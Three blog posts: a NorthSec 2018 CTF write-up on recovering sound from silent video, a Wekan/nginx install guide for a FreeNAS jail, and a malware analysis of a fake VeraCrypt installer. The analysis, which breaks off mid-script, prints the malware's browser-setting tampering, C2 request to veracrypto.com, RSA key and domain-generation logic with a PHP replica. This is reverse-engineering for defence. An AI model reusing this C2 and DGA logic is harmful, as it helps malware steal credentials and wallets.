NorthSec 2018 CTF – Silent Meeting: Write-up

The Silent Meeting challenge at NorthSec 2018 was worth 20 points with only four flags. For this CTF, 20 points is a lot. And there’s a reason: this challenge went out of the box and literally asked you to recover what music was being played from an audioless video of a loudspeaker, and what did people say by looking at the vibrations of a BAG OF CHIPS! Like wuuut?!

At NorthSec, I’ve been the captain of the X-Men team for several years. The team is primarily composed of Concordia University (Montreal, Canada) students, ex-students, and accointances. For this challenge, I worked with my girlfriend who persisted in trying various tools.

This challenge was actually inspired from the research done at the MIT in 2014 by Davis et al. that shows it’s possible to interpret tiny oscillations of objects filmed with a high frame rate and turn them back into sound waves. This enables someone who can only observe objects near speaking people to recover their dialogue. Indeed, when someone speaks, the waves they create in the air put pressure on the objects they encounter (like your eardrums, or plant leaves), making them oscillate slightly according to the waves.

Check this video for a quick explanation and demo:

Context

The challenge comes with the following introduction:

You joined the activits group NOYB (None Of Your Business) who are fighting against the increased national surveillance and tracking of citizens from the British gouvernment.

Your first task is to spy on the the Ministry of Housing, Communities and Local Government who is concocting a plan to set up an colony on Mars on which to send the non-conforming citizens based on the merit points on thir record. The plan is to listen in on the conversations held at 2 Marsham Street from a remote location in line of sight. In the past, the NOYB tried techniques such as the parabolic microphone and a laser microphone but these failed due to the Ministry playing music at their exterior glass to counteract this type of spying. But now, NOYB received from their counterpart on Artemis an ultra performant telephoto lens with glass made of ZAFO, a crystalline quartz-like structure that only forms at 0.216 of Earth gravity.

Before getting all of the details of the operation, you need to prove your wit to the group on a video with no sound, taken in a controlled environment, with the same camera that will be used for the actual mission. This camera records video at a mind boggling 2400 fps. The files that you are provided with have been slowed down 100 times.

NorthSec 2018 – Silent Meeting challenge intro

Question 1

The first video (〰.mp4) shows a loudspeaker on slow motion:

Sample from 〰.mp4

We solved this question in the dumbest way possible: just visually count the beats from the loudspeaker by playing the video at 50% speed to have enough time to keep track of them, then divide by the duration of the video. The beats were regular, confirming there was only one main frequency.

We counted about 113 beats over the 25.708 seconds of the video. As the video has been slowed down 100x according to the instructions, that means the real duration was 0.25708s. That leaves us with a tone frequency of 113/0.25708, which is about 439.55Hz. Let’s say it’s close enough to 440Hz, which is the standard A4.

The flag FLAG-freq1_440 gave us 4 points! That was given…

Question 2

A theoretic question that will bring you back to your signal processing courses, have you had any.

The Shannon’s sampling theorem states that when you want to sample a signal, i.e., convert the analog continuous signal to a discrete digital signal, your sampling frequency needs to be at least twice as fast as the highest frequency in the continuous signal you want to sample. If you pick a lower sampling frequency, your discrete signal will not fully characterize the continuous signal (you lose information).

In other words, if you record the state of a wave twice per second (that is, at a frequency of 2Hz), you will not be able to accurately record any frequency higher than 1Hz. This has to do with the shape of a sinusoidal wave, but can be proven mathematically as well (hence it’s a theorem).

The rolling shutter effect is mentioned in the MIT’s video: when an object moves as you record it with your camera, a single video frame will capture various positions of the object in each row (due to the time it took for the camera sensor to record what it saw). This could increase the maximum frequency you can recover from a video.

Therefore in our case, without the rolling shutter effect, we are bound by Shannon’s sampling theorem. At 2400 fps, we can recover all sounds that make objects move at less than 2400/2 = 1200 Hz.

The flag FLAG-freq2_1200 was worth 1 point.

Question 3

For this question, the previous loudspeaker was playing a song (presumably), not a single tone. Manually counting the beats was going to be difficult…

So we searched for a tool that could convert a video into sound. That’s a weird thing to look for… Obvious no quick Google searches can give us what we really want. We don’t want to extract the audio of a video file, or convert the format. We want to “interpret” the audio that’s “visible” from the video.

We first started in the wrong direction. Given that the vibrations were sometimes small for a naked eye, especially in the next video, we somewhat landed on this MIT project that aims at “magnifying” details in videos: https://people.csail.mit.edu/mrub/vidmag/. We tried to run their code but didn’t understand what we were looking at…

On the right track, let’s look at what the MIT researchers left behind them. On the project’s website, we can find the research paper, along with the Matlab code to do the video -> audio job.

It happened that we had access to a university computer with Matlab installed, so we tried the code. We simply need to adapt the vidName and vidExtension variables to point to 🎶.mp4 (it is recommended to rename this file first…), then let the program run:

Davis et al.’s Matlab program running to recover audio from the video

When prompted to select a folder, pick where you want the recovered .wav to be saved.

The program takes a while to run, and the suspense became unbearable, especially as we were running the code at 5am the last day of the CTF, after we actually tried other codes from different authors that totally didn’t work…

Six long minutes of intense CPU activity later, boom. Matlab error. Also, we got a spectrogram of the recovered sound, and it looks like we’ve got something!

Matlab error at the end of the processing
Recovered sound’s signal and spectrogram

Don’t panic, the Matlab error is due to a function name change. Instead of wavwrite, it now should use audiowrite.

In vmWriteWAV.m, replace wavwrite(S.x, S.samplingRate, fn); by audiowrite(fn, S.x, S.samplingRate); (be careful, the argument order changed). You actually don’t need to rerun the whole program, actually simple run audiowrite("recoveredSound.wav", S.x, S.samplingRate); since S is already in your environment now. Here is the recovered sound:

What a joy when we could hear the recovered melody! I immediately recognized Vangelis – Conquest of paradise, featured in the 1992 film 1492: Conquest of Paradise.

We prepared the flag FLAG-song_conquestofparadise, submitted it in the morning at the CTF and got 6 points!

Question 4

Last but not least, we are now tackling the real deal in audio recovery:

The video indeed features a bag a chips:

🎥.mp4

Since we got the program running for the previous question, why not simply throw it the new video?

1m30 of CPU time, and an audio file:

The most difficult part in this question was to understand what the heck was being spoken…

Recovered audio from 🎥.mp4

We listened to the sample several times. An audiophile team member tweaked it in various ways to finally understand that the sentence was:

WE WILL DEPORT EVERYONE WITH LESS THAN TWO MERIT POINTS

This was actually related to the challenge’s context, talking about merit points:

Your first task is to spy on the the Ministry of Housing, Communities and Local Government who is concocting a plan to set up an colony on Mars on which to send the non-conforming citizens based on the merit points on thir record.

FLAG-deport_everyonewithlessthantwomeritpoints gave us 9 points!

4+1+6+9=20 points, and voilà! With the right tool, it wasn’t that hard.

Install Wekan+nginx (HTTPS) in a FreeNAS jail in 2020

Once again, when you try to combine an unpopular app on an unpopular platform, and you want the latest version of them, the journey is long. Today, we want a FreeNAS 11.3 jail hosting Wekan 4.01, the Trello-like kanban-style board app, behind nginx 1.18.0 with OpenSSL 1.1.1g using TLS 1.3. You may want to do that if you don’t want to share your private boards with yet another cloud company and its likely ambiguous privacy policy.

1. Create a new jail

Assuming you already have created jails in the past, your FreeNAS is ready to make new ones quickly.

Log in to your FreeNAS admin panel, go to Jails, click ADD.

Give it a name (here “wekan-test”), and select the latest release version available, then Next.

Create jail step 1

Check VNET and select either DHCP (if your router can be configured to give static DHCP lease for instance), or give it a static IP. Next. Submit.

Create jail step 2 (static IPv4 only here)

Start the jail by clicking the START button.

Jail is down, start it

Then, SSH to your FreeNAS instance, locate your Jail ID using jls, then jexec <JID> csh.

Locate jail and enter it

2. Install dependencies

Install MongoDB 4.0:

pkg install mongodb40 mongodb40-tools
sysrc mongod_enable=YES
service mongod start

Don’t worry about exposing your DB to the world: MongoDB no longer listens on 0.0.0.0 by default, it only creates a local socket as you can see with sockstat -L:

# sockstat -L
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
mongodb mongod 99827 10 stream /tmp/mongodb-27017.sock

Install node.js 12:

pkg install node12 npm-node12 bcrypt

Make sure python2 can be found by npm:

cd /usr/local/bin
ln -s python2.7 python2

Install some other tools

pkg install nano

3. Install Wekan

Create new user

adduser

Use csh for the shell, and use an empty password. We will disable login after anyway.

Plenty of questions to answer to add a new user

Fetch sources

Go to https://releases.wekan.team/ and locate the ZIP or TAR package for the latest wekan release. This is a Meteor-wrapped bundle, easier to deploy, which is different than cloning the Github repo.

Latest release as of April 29, 2020

Right-click, copy link address.

Back in the jail, switch to the new user wekan, fetch and decompress the archive in the user’s home directory.

su wekan
cd /home/wekan
fetch https://releases.wekan.team/wekan-4.01.zip
tar xzpf wekan-4.01.zip

Remove phantomJS

The version needed is not available on FreeBSD but Wekan works without it.

cd ~/bundle/programs/server/npm/node_modules/meteor/lucasantoniassi_accounts-lockout/node_modules
rm -rf phantomjs-prebuilt

Run npm install a first time

cd ~/bundle/programs/server
npm install

This will fail with a bcrypt error and a node-pre-gyp error.

npm cannot install bcrypt

Fix the node-pre-gyp error

rm -rf /usr/home/wekan/bundle/programs/server/node_modules/.bin/node-pre-gyp
npm install node-pre-gyp

Fix the bcrypt error

npm install bcrypt
cd npm/node_modules
mv bcrypt ~/
cd ../..
npm install
mv ~/bcrypt npm/node_modules

npm install should have completed without error this time.

Install fibers

npm install fibers

4. Configure Wekan

Make a config file

Next, we need to prepare a config file that will apply all the environment variables needed by Wekan.

Grab https://raw.githubusercontent.com/wekan/wekan/master/start-wekan.sh as /home/wekan/start-wekan.sh.

cd ~
fetch https://raw.githubusercontent.com/wekan/wekan/master/start-wekan.sh

Open the file

nano start-wekan.sh

and comment the line cd .build/bundle at the beginning, as well as the lines node main.js and cd ../.. lines towards the end of the file:

#while true; do
      #cd .build/bundle

      [...]

      #node main.js
      # & >> ../../wekan.log
      #cd ../..
#done

Next, adjust ROOT_URL to correspond to the URL you will be using Wekan with. For instance, you could configure an entry in your hosts file to map the FreeNAS jail’s IP with the name wekan (LAN use only). Through a DNS server on your network, you could make sure to resolve, let’s say wekan.lan to the jail’s IP. If you’re exposing Wekan to the internet, you probably will get a domain name for it.

This will give you something like this:

      export ROOT_URL='https://my-super-wekan-setup.com'

For my example, I’ll do wekan-test.lan.

Note: this is not the IP/domain and port that Wekan will be listening on. This is the final form of the URL once served by nginx, which we will configure shortly.

Customize the local port that Wekan will be listening on, and make it bind to localhost only. This is achieved by setting the undocumented BIND_IP environment variable. You don’t want Wekan to be open to the world and directly reachable, it should go through nginx.

      export PORT=3001
      export BIND_IP=127.0.0.1

Make sure to also configure MAIL_URL, MAIL_FROM (not specified in the .sh file), WITH_API, and check other options as well.

Make it a service

Next, we want to start Wekan as a service and use the config we just made. Exit from su wekan, then edit /usr/local/etc/rc.d/wekan.

% exit
# nano /usr/local/etc/rc.d/wekan

Paste the content below into it:

#!/bin/sh
# PROVIDE: wekan
# REQUIRE: mongod nginx
# BEFORE:
# KEYWORD: shutdown

. /etc/rc.subr

name="wekan"
rcvar="wekan_enable"
pidfile="/var/run/${name}.pid"

. /home/wekan/start-wekan.sh
cd /home/wekan/bundle
command="/usr/sbin/daemon"
command_args="-P ${pidfile} -u wekan -r /usr/local/bin/node main.js"

load_rc_config $name
: ${wekan_enable:="NO"}

run_rc_command "$1"

Save and exit. Set the proper permissions:

chmod 555 /usr/local/etc/rc.d/wekan

Enable and start the service.

sysrc wekan_enable=yes
service wekan start

At this point, Wekan should be running, but is only accessible on localhost. One way to test if things are running well is to netcat to localhost on port 3001 (as configured in your start-wekan.sh) and send a simple HTTP request.

# nc localhost 3001
GET / HTTP/1.1
Host: wekan-test.lan
Accept: */*


Check if Wekan is alive

Let’s now disable wekan login:

chsh -s /usr/sbin/nologin wekan

5. Install Nginx

Let’s assume you want the latest nginx version available, with support for TLS 1.3, and you don’t care about legacy clients. You can’t just pkg install nginx. You will get an older version compiled against a version of OpenSSL that doesn’t even support TLS 1.3. You’d not be happy.

Fetch the latest OpenSSL source

Go to https://www.openssl.org/source/ and get the link to the .tar.gz file corresponding to the latest v1.1 release.

OpenSSL download page

Today, this is https://www.openssl.org/source/openssl-1.1.1g.tar.gz.

Fetch the source:

cd /tmp
fetch https://www.openssl.org/source/openssl-1.1.1g.tar.gz
tar zxvf openssl-1.1.1g.tar.gz

Fetch the latest nginx source

Similarly, go to https://nginx.org/en/download.html and get the link to the .tar.gz file corresponding to the latest stable release.

Get the latest nginx stable source

Today, this is https://nginx.org/download/nginx-1.18.0.tar.gz.

Fetch the source.

cd /tmp
fetch https://nginx.org/download/nginx-1.18.0.tar.gz
tar zxvf nginx-1.18.0.tar.gz

Compile nginx with OpenSSL

Note: adjust the path to OpenSSL in the --with-openssl= accordingly. Also, the list of modules for nginx is a small list but should be enough to run Wekan (probably even an overkill).

pkg install perl5
cd nginx-1.18.0
./configure --prefix=/usr/local/etc/nginx --with-cc-opt='-I /usr/local/include' --with-ld-opt='-L /usr/local/lib' --conf-path=/usr/local/etc/nginx/nginx.conf --sbin-path=/usr/local/sbin/nginx --pid-path=/var/run/nginx.pid --error-log-path=/var/log/nginx/error.log --user=www --group=www --modules-path=/usr/local/libexec/nginx --with-file-aio --http-client-body-temp-path=/var/tmp/nginx/client_body_temp --http-proxy-temp-path=/var/tmp/nginx/proxy_temp --http-log-path=/var/log/nginx/access.log --with-http_v2_module --with-http_addition_module --with-http_auth_request_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_realip_module --with-pcre --with-http_slice_module --with-http_ssl_module --with-openssl=../openssl-1.1.1g --with-http_stub_status_module --with-http_sub_module --with-threads
make
make install

Then test it:

# nginx -V
nginx version: nginx/1.18.0
built by clang 8.0.0 (tags/RELEASE_800/final 356365) (based on LLVM 8.0.0)
built with OpenSSL 1.1.1g  21 Apr 2020
TLS SNI support enabled
configure arguments: [...]

Configure nginx

Since we will overwrite the existing config, I find it easier to just delete nginx config file and recreate it:

rm /usr/local/etc/nginx/nginx.conf
touch /usr/local/etc/nginx/nginx.conf
chown root:wheel /usr/local/etc/nginx/nginx.conf
chmod 644 /usr/local/etc/nginx/nginx.conf

Edit this config file:

nano /usr/local/etc/nginx/nginx.conf

Paste the following content in the file:

user  www;

events {
	worker_connections 10;
	# multi_accept on;
}

http {
    # this section is needed to proxy web-socket connections
    map $http_upgrade $connection_upgrade {
        default upgrade;
        ''      close;
    }

    ##
    # Basic Settings
    ##
    include       mime.types;
    default_type  application/octet-stream;
    client_max_body_size 100M;
    server_tokens off;
    charset utf-8;
    sendfile on;
    keepalive_timeout 60;
    gzip on;

    ##
    # Logging Settings
    ##
    log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
                      '$status $body_bytes_sent "$http_referer" '
                      '"$http_user_agent" "$http_x_forwarded_for"';
    #if logging requests is needed
    #access_log  /var/log/access.log  main;
    access_log off;
    error_log /var/log/nginx/error.log;

    server {
        listen       443 ssl http2;
        server_name  wekan-test.lan;

        ##
        # SSL Settings
        ##
        ssl_certificate     /usr/local/etc/ssl/wekan.crt;
        ssl_certificate_key /usr/local/etc/ssl/wekan.key;
        #ssl_password_file   /usr/local/etc/ssl/pass.txt;

        ssl_protocols       TLSv1.3;
        #if clients can't connect (because they don't support TLSv1.3), use:
        #ssl_protocols       TLSv1.3 TLSv1.2;

        #TLS 1.3 and FS TLS 1.2 ciphersuites with EC certificates only
        ssl_ciphers         "TLS_CHACHA20_POLY1305:TLS_AES_128_GCM_SHA256:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256";
        ssl_ecdh_curve      X25519:secp521r1:secp384r1;

        # if using a browser-trusted certificate
        #ssl_stapling on;
        #ssl_stapling_verify on;

        ssl_session_timeout 1h;
        ssl_session_cache shared:SSL:30m;
        ssl_session_tickets off;
        add_header Strict-Transport-Security "max-age=31536000;";
        add_header X-Frame-Options SAMEORIGIN;
        add_header X-Content-Type-Options nosniff;
        add_header X-XSS-Protection "1; mode=block";

        # Pass requests to Wekan.
        # If you have Wekan at https://example.com/wekan , change location to:
        # location /wekan {
        location / {
            # proxy_pass http://127.0.0.1:3001/wekan;
            proxy_pass http://127.0.0.1:3001; # local Wekan instance
            proxy_http_version 1.1;
            proxy_set_header Upgrade $http_upgrade; # allow websockets
            proxy_redirect off;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            # this setting allows the browser to cache the application in a way compatible with Meteor
            # on every application update the name of CSS and JS file is different, so they can be cache infinitely (here: 30 days)
            # the root path (/) MUST NOT be cached
            #if ($uri != '/wekan') {
            #    expires 30d;
            #}
        }
    }
}

At this point, you should customize server_name:

server_name my-super-wekan-setup.com

and your TLS certificate/private key (use EC certificates preferably, otherwise adapt ssl_ciphers):

ssl_certificate /usr/local/etc/ssl/wekan.crt;
ssl_certificate_key /usr/local/etc/ssl/wekan.key;

You can either use your own self-signed certificate or PKI, or get a browser-trusted certificate from Let’s Encrypt and automate the renewal using certbot. This is a separate exercise.

Make sure that the proxy_pass also reflects the port Wekan is listening on:

proxy_pass http://127.0.0.1:3001

Create a client_body_temp folder:

mkdir /var/tmp/nginx
chown www:www /var/tmp/nginx

Check the config:

nginx -t

Make nginx a service

This is needed since we did not install nginx with pkg install. You can skip this step if you first pkg install nginx, then overwrite the installation with make install.

nano /usr/local/etc/rc.d/nginx

Copy the following:

#!/bin/sh
# $FreeBSD: branches/2020Q2/www/nginx/files/nginx.in 518572 2019-11-28 10:17:37Z joneum $

# PROVIDE: nginx
# REQUIRE: LOGIN cleanvar
# KEYWORD: shutdown

#
# Add the following lines to /etc/rc.conf to enable nginx:
# nginx_enable (bool):		Set to "NO" by default.
#				Set it to "YES" to enable nginx
# nginx_profiles (str):		Set to "" by default.
#				Define your profiles here.
# nginx_pid_prefix (str):	Set to "" by default.
#				When using profiles manually assign value to "nginx_"
#				for prevent collision with other PIDs names.
# nginxlimits_enable (bool):	Set to "NO" by default.
#				Set it to yes to run `limits $limits_args`
#				just before nginx starts.
# nginx_flags (str):		Set to "" by default.
#				Extra flags passed to start command.
# nginxlimits_args (str):	Default to "-e -U www"
#				Arguments of pre-start limits run.
# nginx_http_accept_enable (bool): Set to "NO" by default.
#				Set to yes to check for accf_http kernel module
#				on start-up and load if not loaded.

. /etc/rc.subr

name="nginx"
rcvar=nginx_enable

start_precmd="nginx_precmd"
restart_precmd="nginx_checkconfig"
reload_precmd="nginx_checkconfig"
configtest_cmd="nginx_checkconfig"
gracefulstop_cmd="nginx_gracefulstop"
upgrade_precmd="nginx_checkconfig"
upgrade_cmd="nginx_upgrade"
command="/usr/local/sbin/nginx"
_pidprefix="/var/run"
pidfile="${_pidprefix}/${name}.pid"
_tmpprefix="/var/tmp/nginx"
required_files=/usr/local/etc/nginx/nginx.conf
extra_commands="reload configtest upgrade gracefulstop"

[ -z "$nginx_enable" ]		&& nginx_enable="NO"
[ -z "$nginxlimits_enable" ]	&& nginxlimits_enable="NO"
[ -z "$nginxlimits_args" ]	&& nginxlimits_args="-e -U www"
[ -z "$nginx_http_accept_enable" ] && nginx_http_accept_enable="NO"

load_rc_config $name

if [ -n "$2" ]; then
	profile="$2"
	if [ "x${nginx_profiles}" != "x" ]; then
		pidfile="${_pidprefix}/${nginx_pid_prefix}${profile}.pid"
		eval nginx_configfile="\${nginx_${profile}_configfile:-}"
		if [ "x${nginx_configfile}" = "x" ]; then
			echo "You must define a configuration file (nginx_${profile}_configfile)"
			exit 1
		fi
		required_files="${nginx_configfile}"
		eval nginx_enable="\${nginx_${profile}_enable:-${nginx_enable}}"
		eval nginx_flags="\${nginx_${profile}_flags:-${nginx_flags}}"
		eval nginxlimits_enable="\${nginxlimits_${profile}_enable:-${nginxlimits_enable}}"
		eval nginxlimits_args="\${nginxlimits_${profile}_args:-${nginxlimits_args}}"
		nginx_flags="-c ${nginx_configfile} -g \"pid ${pidfile};\" ${nginx_flags}"
	else
		echo "$0: extra argument ignored"
	fi
else
	if [ "x${nginx_profiles}" != "x" -a "x$1" != "x" ]; then
		for profile in ${nginx_profiles}; do
			echo "===> nginx profile: ${profile}"
			/usr/local/etc/rc.d/nginx $1 ${profile}
			retcode="$?"
			if [ "0${retcode}" -ne 0 ]; then
				failed="${profile} (${retcode}) ${failed:-}"
			else
				success="${profile} ${success:-}"
			fi
		done
		exit 0
	fi
fi

# tmpfs(5)
nginx_checktmpdir()
{
	if [ ! -d ${_tmpprefix} ] ; then
		install -d -o www -g www -m 755 ${_tmpprefix}
	fi
}

nginx_checkconfig()
{
	nginx_checktmpdir

	echo "Performing sanity check on nginx configuration:"
	eval ${command} ${nginx_flags} -t
}

nginx_gracefulstop()
{
	echo "Performing a graceful stop:"
	sig_stop="QUIT"
	run_rc_command ${rc_prefix}stop $rc_extra_args || return 1
}

nginx_upgrade()
{
	echo "Upgrading nginx binary:"

	reload_precmd=""
	sig_reload="USR2"
	run_rc_command ${rc_prefix}reload $rc_extra_args || return 1

	sleep 1

	echo "Stopping old binary:"

	sig_reload="QUIT"
	pidfile="$pidfile.oldbin"
	run_rc_command ${rc_prefix}reload $rc_extra_args || return 1
}

nginx_precmd() 
{
	if checkyesno nginx_http_accept_enable
	then
		required_modules="$required_modules accf_http accf_data"
	fi

	nginx_checkconfig

	if checkyesno nginxlimits_enable
	then
		eval `/usr/bin/limits ${nginxlimits_args}` 2>/dev/null
	else
		return 0
	fi
}

run_rc_command "$1"

Give it the right permissions:

chmod 555 /usr/local/etc/rc.d/nginx

Enable the service and start it!

sysrc nginx_enable=yes
service nginx start

Access your Wekan

Now visit your Wekan’s URL.

Wekan is running over HTTPS
Wekan is running with TLS 1.3
Everything runs as the latest version \o/

Ultimate test: restart your jail to see if Wekan come back alive automatically.

Post-scriptum notes

Keep wekan, nginx and openssl updated. Unfortunately, the way we installed the latest versions will prevent us from using a simple pkg upgrade to keep everything up-to-date 😦

Sources

https://www.gitmemory.com/issue/wekan/wekan/2662/538795856
https://github.com/wekan/wekan/wiki/Meteor-bundle
https://github.com/wekan/bundle/blob/master/programs/server/packages/webapp.js#L1196
https://github.com/wekan/wekan/issues/2662
https://github.com/wekan/wekan/wiki/Nginx-Webserver-Config

An Analysis of Modified VeraCrypt binaries (Part 3)

Continuing and finishing on the analysis of the fake VeraCrypt Windows installer distributed on httx://vera-crypt[.]com, I am now reverse-engineering data.dll, which again tries to download another payload from a C2 server. Problem: the server is down. Instead, I’m focusing on recovering an old payload from the same malware family that I decipher from a PCAP by brute-forcing its weak encryption key. In the end, the payloads perform man-in the-browser to analyze the traffic by hooking network functions, and they steal the victim’s saved credentials and cryptocurrency wallets!

Part 2 summary: [ID].exe performs a number of checks to make sure the binary is not being analyzed. It loads big_log in a convoluted way, which decrypts data.dll in memory and jumps to it. In turn, data.dll (not the function data() from Part 1) executes more anti-analysis checks, decrypts hundreds of strings, and dynamically loads a bunch of library functions.

data.dll: Payload or not yet?

Now that we have reconstructed the variable names and library function names, figured out the anti-analysis functions, we can get an overview of the start function.

data.dll start function

A mutex named after the ID is created, then released immediately. The program terminates if the mutex already exists. I’m not sure what’s the intent here, since there is nothing useful happening while the mutex is owned. If this is a way to prevent the program from running twice in parallel, this does not do the job…

The only remaining function to explore is sub_405AA8 (thereafter named main_stuff).

This will get gradually become more interesting, I promise.

Main payload, several functions to analyze

Let’s start with the first function: sub_4055E5. It targets… Firefox!

Firefox preferences

data.dll loads %appdata%\Mozilla\Firefox\Profiles.ini, which describes the profile paths for Firefox, then gets the path of the first profile found, and opens its pref.js, which in turn contains the preferences for Firefox. The following settings are appended:

user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled", false);
user_pref("browser.tabs.remote.autostart", false);
user_pref("browser.tabs.remote.autostart.2", false);
user_pref("gfx.direct2d.disabled", true);
user_pref("layers.acceleration.disabled", true);#89D5ACAA6B4C4765CFD8F8

The modified preferences disable the SPDY algorithm. I have seen this behavior in Wajam that was doing man-in-the-middle of HTTPS traffic and did not handle SPDY until a later version. That may sound like this piece of malware may tamper with network traffic.

The multi-process windows feature in Firefox is also disabled, meaning that instead of spawning a new process per tab, all tabs stay in the same process. This could simplify a process injection kind of thing.

Finally, hardware acceleration is disabled. That, I’m not sure why. Maybe the malware tries to screenshot pages and can’t otherwise? Weird…

Internet Explorer settings

Similarly, IE settings are modified.

Under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main, TabProcGrowth is set to 0. This may have to do with 32-bit add-on in 64-bit IE. Looking forward for that add-on!

Also, IE’s ProtectedMode is disabled by setting NoProtectedModeBanner to 1, and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 to 3.

Randomness, mask and proxy

The next function sub_40460C does a bunch of things.

First, it generates a random 9-character string by using a simple rand() function seeded with the Performance Counter, a high-resolution time stamp.

This random string is hashed with MD5 to give a first digest, which I called randomNameMd5. It is further hashed to give randomNameMd5Md5. Those will be used later.

Next, it loads proxy.txt and mask.txt, that were dropped on the disk and encrypted with the ID (see Part 1). Their meaning will become clear soon.

I’m therefore calling sub_40460C, loadMaskProxyAndGenerateRandomHash.

More payloads in sight

Back to main_stuff, the next function called is sub_4052DD.

This function receives two pointers, and a boolean, and returns a buffer. The boolean determines whether the buffer is filled with the content of a file read from disk or whether the content is the result of a network request (also cached to disk for future calls). The two pointers correspond to 32 and 64-bit payloads, which are handled separately.

Although that’s what the function is designed to do, the arguments passed to it will direct the function to only fetch a 32-bit payload from an online resource and write it to disk, as outlined below.

The part from sub_4052DD that gets run, function calls are renamed by me

The function that I named readFileAndCheckIfMZ is self-explanatory:

readFileAndCheckIfMZ

In turn, checkIfMZ simply checks that the buffer is at least 0x400 bytes and starts with MZ: return size > 0x400 && *buf == 'M' && buf[1] == 'Z';

Said otherwise, if the payload does not already exist on disk, cannot be loaded and decrypted, or is not an executable file, we go to getPayloadAndWriteToFile.

Communication with C2 server

The function getPayloadAndWriteToFile is similar to readFileAndCheckIfMZ but instead of reading a file, it calls sub_404665(&bin32or64, &payloadSize). The first argument is the string bin|int32 in our case, and the second argument will receive the size of the returned buffer.

This function sub_404665 is slightly long, but can be approximated with the following pseudo-code:

gotValidResponse = false
while (!gotValidResponse) {
  request = RSAEncryptAndReverseAndBase64(randomNameMd5 + '||' + proxy + '||' + id + '||')
  request += '||delimiter||'
  request += base64("bin|int32")  // YmlufGludDMy
  request += '||delimiter||'

  send request as POST data to http://proxy:80/p1.php
  if there is randomNameMd5Md5 in response, gotValidResponse = true, break
  otherwise, change "proxy" domain to an alternative one
}
decryptedPayload = response[32:] ^ (pad of randomNameMd5)

Several interesting things happen here.

RSA encryption of POST data

First, what I called RSAEncryptAndReverseAndBase64 performs an RSA encryption operation using the following hardcoded 2048-bit RSA public key, reverses the string for whatever reason, and base64-encodes it. The encryption relies on the old CryptEncrypt API.

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxxUk/C3M413qwlO04xFJ
EbzBzFz7Sy+mv1bSq4uD2L3dCZLeDKgsdRm83N8y0/kjqa1mv28l0SwgtmOA6Z02
0GM3CCfgHhv/1gIVWahHC8KKnfEmg4G1dUYR2C22ltPsF/DPrruWk/kExUQtzAu3
hWPz2Qe7ZhEAbcpvfYfXU6iXB6pN+iiRjg8wzqPGlwoYNfOFy3HqePAW/IKKtYzE
hCKD9PaIhAQQlJwcYVSybopHdL30lzMxKmop6I7kwxVieukaDLDQiU68nExc9Fyg
U1TXPCkNN+BvgdNwjPrRNMX29GHwc2aZK9wnMXuO59WDAY3M4invvdukhEcgEtIU
2QIDAQAB
-----END PUBLIC KEY-----

The plaintext will look like this:

"30c6f2381c9c26dbb31d97e0496f6589||veracrypto.com||89D5ACAA6B4C4765CFD8F8||"

The encrypted string is concatenated with other strings, as shown in the pseudo-code. An example of the first HTTP request sent to the C2 server is as follows.

POST /p1.php HTTP/1.1
Host: veracrypto.com
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 396

kb5jgFvQtojqoDpahHuEs0A7UL44jxXCNaVRXc4+krFp27OHCi5onU2gHMjCTeZD
MX0GDJjX9U42PCx6eVx0cIrhccO/Hz/GUdkM0NbFTuNiBEpxC+c0eaRmhlOa7Bwo
RIcXia+KN3vsOZTeklqu6wkZbgIcVtUvUxJ2yr60X7XT8ClS0WHP+IOHrsxJhMJ9
W7u+UkCWbIJnBdzELKDxNQTUQTV6185byijg0iBTwRAktMLO/dTiixcawF3yhmau
JUgoXd579HlrjUKrp2zHa+U/RCca1Ql2NNxEnv7tDK48orahvYFxyz8VbGOUryoE
FiIeapZx93mpZtNHGkq2Dg==
||delimiter||YmlufGludDMy
||delimiter||

Although this first request does not contain very thrilling information, if we are provided with only network traffic captures, it’s not possible to decrypt it without the RSA private key. This will have consequences soon as I will try to decrypt the server’s response of another similar malware sample.

Domain Generation Algorithm

The next interesting thing happens when the request fails (e.g., the hardcoded domain cannot be contacted), there is a domain generation function (sub_404B33, which I called changeToAlternativeDomain) that will output new ones!

The high-level idea of the algorithm is the following.

// those global variables are initialized elsewhere
numberOfAttempt = 0;
proxy = "veracrypto.com";

changeToAlternativeDomain() {
  if (numberOfAttempt > 0)
    proxy = domainGenerateAlgorithm(numberOfAttempt);
  else
    proxy = decrypted content of proxy.txt
  numberOfAttempt++
  Sleep(1000)
}

When first called, the same hardcoded domain “veracrypto.com” will be returned and tried again. Upon the following calls to changeToAlternativeDomain, the domain will be generated by domainGenerateAlgorithm (sub_4043D5).

Recall mask.txt? Now, it enters the picture, and is actually a format string for sprintf!

The decrypted mask is %d_yq_%02u.%02u.%02u. It is populated with the number of attempts to reach a server and the current date. The result is hashed using MD5, and appended with “.com”.

GetLocalTime(&SystemTime);
wsprintfa(formatedDate, mask, numberOfAttempt, SystemTime.wDay, SystemTime.wMonth, SystemTime.wYear);
formatedDateMd5 = md5(formatedDate);
lstrcatA(formatedDateMd5, ".com");

If you take today as an example, you will get the first alternative domain to be:
md5("1_yq_09.03.2020")+".com", which gives 7a491cdec4b304f67966b85219f2fc94.com.

Server response?

Now, unfortunately, at the time of writing, veracrypto.com is no longer operational. It resolves to 176.114.8.24, but the server seems to be down. Also, today’s alternative domains do not exist.

I wanted to know if there was any other alternative domain for any day in the past that points to another server where I could fetch the server’s response.

I made a quick PHP script to replicate the Domain Generation Algorithm (DGA) and enumerate up to seven alternative domains per day in the past year.
(Note: seven is the hardcoded maximum, after which the counter loops back)

<?php
$date = new DateTime('today -1 year');
$end = new DateTime('today +1 week');
while ($date <= $end) {
  for ($attempt=1; $attempt<=7; $attempt++) {
    $domain = $attempt.'_yq_'.$date->format('d.m.Y');
    echo $domain."\t";
    $domain = md5($domain).'.com';
    echo $domain."\t";
    $ip = gethostbyname($domain);
    if ($ip === $domain) echo "no";
